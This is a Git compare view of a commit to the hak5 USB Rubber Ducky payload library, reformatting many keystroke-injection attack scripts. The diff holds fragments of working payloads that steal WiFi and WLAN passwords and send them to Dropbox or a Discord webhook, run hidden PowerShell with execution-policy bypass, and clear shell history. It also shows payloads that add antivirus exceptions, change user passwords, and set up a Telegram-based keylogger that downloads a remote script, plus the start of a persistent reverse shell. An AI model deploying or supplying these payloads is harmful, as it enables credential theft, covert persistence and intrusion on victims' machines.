hak5
/
usbrubberducky-payloads
mirror of https://github.com/hak5/usbrubberducky-payloads.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Compare commits

base: hak5:862ad0397a14c7ba13561097ffe86e971df82268
Branches Tags
hak5:master
hak5:improve-duckylogger
hak5:more_extensions
hak5:add-docs
...
compare: hak5:29dbc6e43191e91ec223306b04b3e3606e9b5ca1
Branches Tags
hak5:master
hak5:improve-duckylogger
hak5:more_extensions
hak5:add-docs

2 Commits
862ad0397a ... 29dbc6e431

Author SHA1 Message Date
Aleff 29dbc6e431
Merge 0f1e1af17c into 675972662a 2024-09-24 21:21:00 -04:00
Alessandro Greco 0f1e1af17c Several improvements in payloads 
[+] Replacements of initial delays with DETECT_READY for GNU/Linux systems and PASSIVE_WINDOWS_DETECT for Windows systems.

[+] Replacement of STRING and ENTER in STRINGLN.

[+] Use of REM_BLOCK to make the code clearer.

[+] Order DEFINE variables at the beginning following the standard #EXAMPLE procedure.

[+] Various corrections, if any.
 2024-09-02 12:25:43 +02:00
69 changed files with 2718 additions and 1154 deletions
Show Stats Expand all files Collapse all files

60
payloads/library/credentials/ExfiltrateWiFiPasswords_Linux/payload.txt
View File

@ -1,27 +1,53 @@
REM ####################################################### REM_BLOCK
REM # | #######################################################
REM # Title : Exfiltrate Wifi Passwords - Linux | # #
REM # Author : Aleff | # Title : Exfiltrate Wifi Passwords - Linux #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Exfiltration, Credentials, Execution | # Version : 1.0 #
REM # Target : Linux | # Category : Exfiltration, Credentials, Execution #
REM # | # Target : Linux #
REM ####################################################### # #
#######################################################
END_REM
REM Requirements: REM Requirements:
REM - Permissions REM - Permissions
REM - Internet connection REM - Internet connection
REM - Dropbox Token REM - Dropbox Token
DELAY 1000 EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t CTRL-ALT t
DELAY 2000 DELAY 2000
REM #### PREREQUISITES SECTION #### REM #### PREREQUISITES SECTION ####
REM Required: You need to know the sudo password and replace 'example' with this REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example DEFINE SUDO_PASS example
STRING sudo su STRING sudo su
@ -41,8 +67,6 @@ ENTER
REM #### ZIP SECTION #### REM #### ZIP SECTION ####
DELAY 500 DELAY 500
STRING RANDOM=$(shuf -i 1-999999999999 -n 1) STRING RANDOM=$(shuf -i 1-999999999999 -n 1)
ENTER ENTER
@ -61,8 +85,6 @@ ENTER
REM #### WiFi && ZIP SECTION #### REM #### WiFi && ZIP SECTION ####
REM Get all WiFi data REM Get all WiFi data
STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do STRING for conn in $(nmcli connection show | grep wifi | awk '{print $1}'); do
ENTER ENTER
@ -85,8 +107,6 @@ DELAY 3000
REM #### EXFILTRATE SECTION #### REM #### EXFILTRATE SECTION ####
REM Set yout Dropbox folder name REM Set yout Dropbox folder name
DEFINE DROPBOX_FOLDER_NAME example DEFINE DROPBOX_FOLDER_NAME example
STRING DROPBOX_FOLDER="/ STRING DROPBOX_FOLDER="/
@ -105,8 +125,6 @@ ENTER
REM #### REMOVE TRACES #### REM #### REMOVE TRACES ####
DELAY 2000 DELAY 2000
STRING history -c STRING history -c
ENTER ENTER

43
payloads/library/credentials/WLAN-Windows-Passwords/payload.txt
View File

@ -10,8 +10,49 @@ REM # |
REM ################################################################### REM ###################################################################
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
DELAY 2000
GUI r GUI r
DELAY 250 DELAY 250
STRING powershell -w h -ep bypass $discord=' STRING powershell -w h -ep bypass $discord='

65
payloads/library/execution/Add_An_Excepiton_To_Avast_Antivirus/payload.txt
View File

@ -1,24 +1,65 @@
REM ######################################################## REM_BLOCK
REM # | ########################################################
REM # Title : Add An Exception To Avast Antivirus | # #
REM # Author : Aleff | # Title : Add An Exception To Avast Antivirus #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Execution | # Version : 1.0 #
REM # Target : Windows 10/11 | # Category : Execution #
REM # | # Target : Windows 10/11 #
REM ######################################################## # #
########################################################
END_REM
REM Requirements: REM Requirements:
REM - Avast installed and configured REM - Avast installed and configured
REM Set the full-path that you want to set as exception REM Set the full-path that you want to set as exception
DEFINE FULL-PATH example/to/path DEFINE FULL-PATH example/to/path
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Avast application REM Open Avast application
DELAY 2000
GUI GUI
DELAY 1000 DELAY 1000
STRING avast STRING avast

21
payloads/library/execution/Call_Someone_On_An_iPhone/payload.txt
View File

@ -1,13 +1,14 @@
REM ############################################## REM_BLOCK
REM # | ##############################################
REM # Title : Call Someone On An iPhone | # |
REM # Author : Aleff | # Title : Call Someone On An iPhone |
REM # Version : 1.0 | # Author : Aleff |
REM # Category : Execution | # Version : 1.0 |
REM # Target : iPhone | # Category : Execution |
REM # | # Target : iPhone |
REM ############################################## # |
##############################################
END_REM
REM Requirements: REM Requirements:
REM - The phone must be unlocked REM - The phone must be unlocked

20
payloads/library/execution/ChangeGitRemoteLink/payload.txt
View File

@ -1,12 +1,14 @@
REM ########################################### REM_BLOCK
REM # | ###########################################
REM # Title : Change Remote Git Link | # #
REM # Author : Aleff | # Title : Change Remote Git Link #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Execution | # Version : 1.0 #
REM # Target : Windows 10-11/Linux | # Category : Execution #
REM # | # Target : Windows 10-11/Linux #
REM ########################################### # #
###########################################
END_REM
REM Requirements: REM Requirements:
REM - Internet Connection REM - Internet Connection

53
payloads/library/execution/ChangeMacAddress_Linux/payload.txt
View File

@ -1,25 +1,50 @@
REM_BLOCK
REM ########################################### ###########################################
REM # | # #
REM # Title : Change Linux MAC Address | # Title : Change Linux MAC Address #
REM # Author : Aleff | # Author : Aleff #
REM # Version : 1.0 | # Version : 1.0 #
REM # Category : Execution | # Category : Execution #
REM # Target : Linux | # Target : Linux #
REM # | # #
REM ########################################### ###########################################
END_REM
REM Requirements: REM Requirements:
REM - Permissions REM - Permissions
DELAY 1000 EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t CTRL-ALT t
DELAY 2000 DELAY 2000
REM #### PERMISSIONS SECTION #### REM #### PERMISSIONS SECTION ####
REM You need to know the sudo password and replace 'example' with this REM You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example DEFINE SUDO_PASS example

52
payloads/library/execution/ChangeNetworkConfiguration_Linux/payload.txt
View File

@ -1,25 +1,49 @@
REM_BLOCK
REM ############################################### ###############################################
REM # | # #
REM # Title : Change Network Configuration | # Title : Change Network Configuration #
REM # Author : Aleff | # Author : Aleff #
REM # Version : 1.0 | # Version : 1.0 #
REM # Category : Execution | # Category : Execution #
REM # Target : Linux | # Target : Linux #
REM # | # #
REM ############################################### ###############################################
END_REM
REM Requirements: REM Requirements:
REM - Permissions REM - Permissions
DELAY 1000 EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t CTRL-ALT t
DELAY 2000 DELAY 2000
REM #### PERMISSIONS SECTION #### REM #### PERMISSIONS SECTION ####
REM Required: You need to know the sudo password and replace 'example' with this REM Required: You need to know the sudo password and replace 'example' with this
DEFINE SUDO_PASS example DEFINE SUDO_PASS example
STRING sudo su STRING sudo su

64
payloads/library/execution/Change_Windows_User_Name/payload.txt
View File

@ -1,12 +1,14 @@
REM ############################################# REM_BLOCK
REM # | #############################################
REM # Title : Change Windows User Name | # #
REM # Author : Aleff | # Title : Change Windows User Name #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Execution | # Version : 1.0 #
REM # Target : Windows 10/11 | # Category : Execution #
REM # | # Target : Windows 10/11 #
REM ############################################# # #
#############################################
END_REM
REM Requirements: REM Requirements:
REM - Nothing REM - Nothing
@ -17,8 +19,50 @@ REM - Payload tested on Windows 11 Eng
REM Set the new name that you want to set REM Set the new name that you want to set
DEFINE NEW_NAME example DEFINE NEW_NAME example
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
REM Open Windows research REM Open Windows research
DELAY 2000
GUI GUI
DELAY 1000 DELAY 1000

64
payloads/library/execution/Change_the_password_of_the_windows_user/payload.txt
View File

@ -1,12 +1,14 @@
REM ############################################################ REM_BLOCK
REM # | ############################################################
REM # Title : Change the password of the Windows user | # #
REM # Author : Aleff | # Title : Change the password of the Windows user #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Execution | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Execution #
REM # | # Target : Windows 10-11 #
REM ############################################################ # #
############################################################
END_REM
REM Requirements: REM Requirements:
REM - Nothing (i know it's absurd) REM - Nothing (i know it's absurd)
@ -14,7 +16,49 @@ REM - Nothing (i know it's absurd)
REM You must define the new Windows user password REM You must define the new Windows user password
DEFINE NEW_PASSWORD example DEFINE NEW_PASSWORD example
DELAY 1000 EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI x GUI x
DELAY 500 DELAY 500
STRING a STRING a

2
payloads/library/execution/CloseAllApplicationsInWindows/README.md
View File

@ -1,4 +1,4 @@
# Close All Applications - BADUSB ✅ # Close All Applications
A script used to close all target open applications. A script used to close all target open applications.

66
payloads/library/execution/CloseAllApplicationsInWindows/payload.txt
View File

@ -1,27 +1,69 @@
REM ##################################################### REM_BLOCK
REM # | #####################################################
REM # Title : Close All Applications | # #
REM # Author : Aleff | # Title : Close All Applications #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Execution | # Version : 1.0 #
REM # Target : Windows 10-11 | # Category : Execution #
REM # | # Target : Windows 10-11 #
REM ##################################################### # #
#####################################################
END_REM
REM Plug-And-Play REM Plug-And-Play
REM
REM 1. Open a powershell REM 1. Open a powershell
REM 2. Download a Python script REM 2. Download a Python script
REM 3. Execute it REM 3. Execute it
REM 4. Remove Python script downloaded REM 4. Remove Python script downloaded
REM 5. Delete powershell history REM 5. Delete powershell history
REM
REM Reply with YOUR LINK. The Payload should be close_all_app.ps1 REM Reply with YOUR LINK. The Payload should be close_all_app.ps1
DEFINE POWERSHEL_CODE example.com DEFINE POWERSHEL_CODE example.com
DELAY 2000 EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI x GUI x
DELAY 250 DELAY 250
DOWNARROW DOWNARROW

49
payloads/library/execution/Defend_yourself_against_AtlasVPN_Bug-Door/payload.txt
View File

@ -1,12 +1,14 @@
REM ############################################################ REM_BLOCK
REM # # ############################################################
REM # Title : Defend yourself against AtlasVPN Bug-Door # # #
REM # Author : Aleff # # Title : Defend yourself against AtlasVPN Bug-Door #
REM # Version : 1.0 # # Author : Aleff #
REM # Category : Execution # # Version : 1.0 #
REM # Target : Linux # # Category : Execution #
REM # # # Target : Linux #
REM ############################################################ # #
############################################################
END_REM
REM Requirements: REM Requirements:
REM - Administrator Permission REM - Administrator Permission
@ -15,7 +17,34 @@ REM - AtlasVPN installed
REM Define the sudo user password REM Define the sudo user password
DEFINE #SUDO-PWS example DEFINE #SUDO-PWS example
DELAY 1000 EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t CTRL-ALT t
DELAY 2000 DELAY 2000

52
payloads/library/execution/Edit_The_Default_Real_App_With_An_Arbitrary/payload.txt
View File

@ -1,14 +1,14 @@
REM_BLOCK
REM ################################################################ ################################################################
REM # | # #
REM # Title : Edit The Default Real App With An Arbitrary | # Title : Edit The Default Real App With An Arbitrary #
REM # Author : Aleff | # Author : Aleff #
REM # Version : 1.0 | # Version : 1.0 #
REM # Category : Execution | # Category : Execution #
REM # Target : GNU/Linux (Debian based tested) | # Target : GNU/Linux (Debian based tested) #
REM # | # #
REM ################################################################ ################################################################
END_REM
REM Requirements: REM Requirements:
REM - sudo permissions REM - sudo permissions
@ -16,11 +16,9 @@ REM - Internet connection
REM - Executable app REM - Executable app
REM - '.desktop' file REM - '.desktop' file
REM Note: REM Note:
REM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it REM - The Depends* time depends by the app size, the connection fast and the computer power, you should test it
REM Set the link from wich will be downloaded the zip archive REM Set the link from wich will be downloaded the zip archive
DEFINE ARBITRARY_APP_LINK example DEFINE ARBITRARY_APP_LINK example
@ -33,9 +31,35 @@ DEFINE ORIGINAL_DESKTOP_FILE_NAME example
REM sudo permissions needed REM sudo permissions needed
DEFINE SUDO example DEFINE SUDO example
EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
REM Open a shell REM Open a shell
DELAY 2000
CTRL-ALT t CTRL-ALT t
DELAY 1000 DELAY 1000

53
payloads/library/execution/ExploitingAnExecutableFile/payload.txt
View File

@ -1,25 +1,50 @@
REM_BLOCK
REM ################################################ ################################################
REM # | # #
REM # Title : Exploiting An Executable File | # Title : Exploiting An Executable File #
REM # Author : Aleff | # Author : Aleff #
REM # Version : 1.0 | # Version : 1.0 #
REM # Category : Execution | # Category : Execution #
REM # Target : Linux | # Target : Linux #
REM # | # #
REM ################################################ ################################################
END_REM
REM Requirements: REM Requirements:
REM - Nothing, it is Plug-And-Play but you can change it as you want. REM - Nothing, it is Plug-And-Play but you can change it as you want.
DELAY 1000 EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t CTRL-ALT t
DELAY 2000 DELAY 2000
REM #### Script #### REM #### Script ####
STRINGLN STRINGLN
function search_file { function search_file {
for file in "$1"/*; do for file in "$1"/*; do

8
payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/README.md
View File

@ -108,17 +108,11 @@ Happy Hacking!
</a> </a>
<br>Github <br>Github
</td> </td>
<td align="center" width="96">
<a href="https://www.instagram.com/alessandro_greco_aka_aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/instagram.png?raw=true width="48" height="48" />
</a>
<br>Instagram
</td>
<td align="center" width="96"> <td align="center" width="96">
<a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/"> <a href="https://www.linkedin.com/in/alessandro-greco-aka-aleff/">
<img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" /> <img src=https://github.com/aleff-github/aleff-github/blob/main/img/linkedin.png?raw=true width="48" height="48" />
</a> </a>
<br>Discord <br>Linkedin
</td> </td>
</tr> </tr>
</table> </table>

64
payloads/library/execution/Install_And_Run_Any_Arbitrary_Executable-No_Internet_And_Root_Needed/payload.txt
View File

@ -1,27 +1,67 @@
REM ########################################################################################### REM_BLOCK
REM # | ###########################################################################################
REM # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed | # #
REM # Author : Aleff | # Title : Install And Run Any Arbitrary Executable - No Internet And Root Needed #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Execution | # Version : 1.0 #
REM # Target : Windows 10/11 | # Category : Execution #
REM # | # Target : Windows 10/11 #
REM ########################################################################################### # #
###########################################################################################
END_REM
REM Requirements: REM Requirements:
REM - Nothing REM - Nothing
REM Define here your hexadecimal code REM Define here your hexadecimal code
DEFINE #HEX_CODE example DEFINE #HEX_CODE example
REM Note: REM Note:
REM - Tested on Windows 11 REM - Tested on Windows 11
REM - Running checked but not blocked by Avast antivirus REM - Running checked but not blocked by Avast antivirus
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r GUI r
DELAY 1000 DELAY 1000
STRINGLN notepad.exe STRINGLN notepad.exe

61
payloads/library/execution/Make_Windows_performant_but_ugly_and_boring/payload.txt
View File

@ -1,12 +1,14 @@
REM ################################################################## REM_BLOCK
REM # | ##################################################################
REM # Title : Make Windows performant (but ugly and boring) | # #
REM # Author : Aleff | # Title : Make Windows performant (but ugly and boring) #
REM # Version : 1.0 | # Author : Aleff #
REM # Category : Execution | # Version : 1.0 #
REM # Target : Windows 10/11 | # Category : Execution #
REM # | # Target : Windows 10/11 #
REM ################################################################## # #
##################################################################
END_REM
REM Plug-And-Play <3 REM Plug-And-Play <3
@ -16,7 +18,48 @@ REM - Nothing
REM Note: REM Note:
REM - Payload tested on Windows 11 Eng REM - Payload tested on Windows 11 Eng
EXTENSION PASSIVE_WINDOWS_DETECT
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
Windows fully passive OS Detection and passive Detect Ready
Includes its own passive detect ready.
Does not require additional extensions.
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
$_OS will be set to WINDOWS or NOT_WINDOWS
See end of payload for usage within payload
END_REM
REM CONFIGURATION:
DEFINE #MAX_WAIT 150
DEFINE #CHECK_INTERVAL 20
DEFINE #WINDOWS_HOST_REQUEST_COUNT 2
DEFINE #NOT_WINDOWS 7
$_OS = #NOT_WINDOWS
VAR $MAX_TRIES = #MAX_WAIT
WHILE(($_RECEIVED_HOST_LOCK_LED_REPLY == FALSE) && ($MAX_TRIES > 0))
DELAY #CHECK_INTERVAL
$MAX_TRIES = ($MAX_TRIES - 1)
END_WHILE
IF ($_HOST_CONFIGURATION_REQUEST_COUNT > #WINDOWS_HOST_REQUEST_COUNT) THEN
$_OS = WINDOWS
END_IF
REM_BLOCK EXAMPLE USAGE AFTER EXTENSION
IF ($_OS == WINDOWS) THEN
STRING HELLO WINDOWS!
ELSE
STRING HELLO WORLD!
END_IF
END_REM
END_EXTENSION
GUI r GUI r
DELAY 2000 DELAY 2000

48
payloads/library/execution/Persistent_Keylogger-Telegram_Based/payload.txt
View File

@ -1,12 +1,14 @@
REM ######################################################## REM_BLOCK
REM # # ########################################################
REM # Title : Persistent Keylogger - Telegram Based # # #
REM # Author : Aleff # # Title : Persistent Keylogger - Telegram Based #
REM # Version : 1.0 # # Author : Aleff #
REM # Category : Execution # # Version : 1.0 #
REM # Target : Linux # # Category : Execution #
REM # # # Target : Linux #
REM ######################################################## # #
########################################################
END_REM
REM Requirements: REM Requirements:
REM - Internet Connection REM - Internet Connection
@ -14,7 +16,33 @@ REM - Internet Connection
REM Here you must put your own file link REM Here you must put your own file link
DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py DEFINE #PYTHON-SCRIPT-LINK https://www.example.com/connection.py
DELAY 1000 EXTENSION DETECT_READY
REM VERSION 1.1
REM AUTHOR: Korben
REM_BLOCK DOCUMENTATION
USAGE:
Extension runs inline (here)
Place at beginning of payload (besides ATTACKMODE) to act as dynamic
boot delay
TARGETS:
Any system that reflects CAPSLOCK will detect minimum required delay
Any system that does not reflect CAPSLOCK will hit the max delay of 3000ms
END_REM
REM CONFIGURATION:
DEFINE #RESPONSE_DELAY 25
DEFINE #ITERATION_LIMIT 120
VAR $C = 0
WHILE (($_CAPSLOCK_ON == FALSE) && ($C < #ITERATION_LIMIT))
CAPSLOCK
DELAY #RESPONSE_DELAY
$C = ($C + 1)
END_WHILE
CAPSLOCK
END_EXTENSION
CTRL-ALT t CTRL-ALT t
DELAY 2000 DELAY 2000

48
payloads/library/execution/Persistent_Reverse_Shell-Telegram_Based/payload.txt
View File

@ -1,12 +1,14 @@
REM ############################################################ REM_BLOCK
REM # # ############################################################
REM # Title : Persistent Reverse Shell - Telegram Based # # #
